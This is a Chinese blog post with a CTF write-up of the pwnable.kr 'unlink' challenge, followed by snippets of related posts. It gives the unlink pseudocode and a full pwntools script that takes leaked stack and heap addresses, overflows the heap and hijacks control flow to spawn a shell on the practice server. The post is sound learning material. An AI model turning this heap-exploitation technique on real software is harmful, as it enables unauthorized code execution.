pwnable之unlink

最新推荐文章于 2025-05-26 09:34:30 发布
最新推荐文章于 2025-05-26 09:34:30 发布
阅读量727 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pwd_3/article/details/78137757

问题分析

程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出

经典的unlink attack,这里就不介绍了。

//unlink
bk_chunk = p->bk
fd_chunk = p->fd
bk_chunk->fd = fd_chunk
fd_chunk->bk = bk_chunk

solv.py

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
cn = ssh(host='pwnable.kr',port=2222,user='unlink',password='guest')
p = cn.process('./unlink')
elf = ELF('unlink')
shell_addr = elf.symbols['shell']
#gdb.attach(p,'b unlink\n')
p.recvuntil('here is stack address leak: ')
stack_leak = p.recvuntil('\n')[:-1]
p.recvuntil('here is heap address leak: ')
heap_leak =  p.recvuntil('\n')[:-1]
stack_leak = int(stack_leak,16)
heap_leak = int(heap_leak,16)
log.info("stack leak {}".format(hex(stack_leak)))
log.info("heap leak {}".format(hex(heap_leak)))
stack2_addr = stack_leak + 0x14 - 0x8
heap2_addr = heap_leak + 0xc

payload = p32(shell_addr) + 'aaaa' * 3 +  p32(stack2_addr) + p32(heap2_addr) 
#raw_input('send payload')
p.sendline(payload)
p.interactive()
堆溢出 pawnable.kr Unlink
nibiru_holmes的博客
03-08 1813
题目地址:http://pwnable.kr/play.php 按题目提示连接  ssh unlink@pwnable.kr -p2222 (pw: guest) ls    发现和之前的题目一样: 三个文件分别是 flag,unlink,unlink.c 先查看unlink.c  源码如下: #include #include #include typedef struct tag
堆溢出之unlink_地址任意写
zhuo1358的博客
09-15 946
我们先来回顾一下堆方面的基础知识,我们知道,当我们free一个大小超过0x90的chunk时,会检查这个chunk物理意义上相邻的前一个chunk是否是空闲状态,如果是,两个chunk会合并成一个大的chunk来合理利用空间。这里的p64(0x30)是下一个chunk的pre_size域,p64(0x90)是下一个chunk的大小,目的是为了触发unlink和绕过检查(只有一个大于0x80的chunk释放时才会触发unlink):检查与被释放chunk相邻高地址的chunk的size的P标志位是否为0。
pwnable.kr】 unlink
weixin_30340745的博客
07-16 258
pwnable.kr 第一阶段的最后一题! 这道题目就是堆溢出的经典利用题目,不过是把堆块的分配与释放操作用C++重新写了一遍,可参考《C和C++安全编码一书》//不是广告 #include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ ...
unlink知识点和手法
最新发布
2401_88087539的博客
05-26 711
pwn新手小白,写完题后整理的一点点思路,有任何问题各位师傅可以提出,接收批评指正
unlink - pwnable
SkYe's Blog
09-30 545
预习知识 什么是unlinked unlinked 是堆溢出中的一种常见形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。(将双向链表上的chunk卸载下来与物理chunk合并) unlink漏洞条件 有3个以上的空闲chunk链表,其中最前面的chunk存在有堆溢出 unlink的触发 当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否空闲...
pwnable.kr-unlink
r00tnb的博客
07-26 487
前言 这是一道简化了的linux下malloc堆溢出漏洞利用。需要理解linux下关于glibc的堆管理的相关内容,参考 分析 分析源码unlink.c typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ syst...
[BUUCTF pwn] pwnable_unlink
weixin_52640415的博客
01-02 757
这种题见得少,看漏了两点,不过又学了东西。 题目只给了ssh地址用户和端口号,登上去看有源码和程序,于是下下来。二进制不让cat,但是里边居然安了python,一句话生成base64,再取回来。 unlink@out:~$ ls -l total 16 -rw-r----- 1 root root 43 Jan 2 07:31 flag.txt -rwsr-sr-x 1 root root 7448 Feb 14 2020 unlink -rw-r--r-- 1 root root 772
堆漏洞之unlink1
08-04
《深入理解堆漏洞:以unlink1为例》 堆漏洞是一种常见的软件安全问题,尤其是在C语言编程中,由于程序员对内存管理不当,可能导致严重的安全风险。本文将深入探讨一种名为"unlink1"的堆漏洞利用技巧,以及其在特定...
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
npm报错error code EPERM, error syscall unlink,errno -4048解决
01-08
安装报错信息 24741 error code EPERM 24742 error syscall unlink ...24745 error Error: EPERM: operation not permitted, unlink 'E:\workspaces\multiplatform\node_modules\.staging\regexpp-c7c4
pwnable.kr unlink
snowleopard_bin的博客
09-20 336
题目源码如下: #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ sys...
C 语言unlink 函数
黑夜中的斗狼
09-02 1140
相关函数:link, rename, remove 头文件:#include 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连
初级堆溢出-unlink漏洞
weixin_34395205的博客
09-30 331
Linux下堆的unlink漏洞 参考文章:https://blog.youkuaiyun.com/qq_25201379/article/details/81545128 首先介绍一下Linux的堆块结构: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk *f...
全面剖析Pwnable.kr unlink
Bill
08-10 2179
   最近一直在学习堆方面的知识,unlink是CTF中考察堆方面知识的重点.于是就拿一道简单的例题来剖析一下.堆方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
pwnable.kr】unlink - unlink4字节写,劫持ecx到堆中获取main_retaddr
think_ycx的专栏
11-23 361
题目信息 直接看源码: 这题思路很清晰,程序模拟了最简单的unlink过程,unlink的本质就是把中间的chunk从前后解链,同时修改前面chunk的fd和后面chunk的bk。如果可以溢出了会被unlink的chunk,32bit下在FD-&gt;bk=BK时,拥有一次4bit写的机会,同时需要保证BK-&gt;fd可写(BK-&gt;fd=FD同理)。 拥有任意地址写的机会...
Unlink
yjh_fnu_ltn的博客
07-18 1012
下面我们首先介绍一下 unlink 最初没有防护时的利用方法,然后介绍目前利用 unlink 的方式。
unlink
03-26
无论是通过代码实现还是手动操作终端界面来运用这两个工具都能达到相同的目的——即销毁特定实体对象于存储介质之上。但是它们各自适用场景有所不同:前者更多应用于自动化脚本编写当中以便动态管理资源生命周期;后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值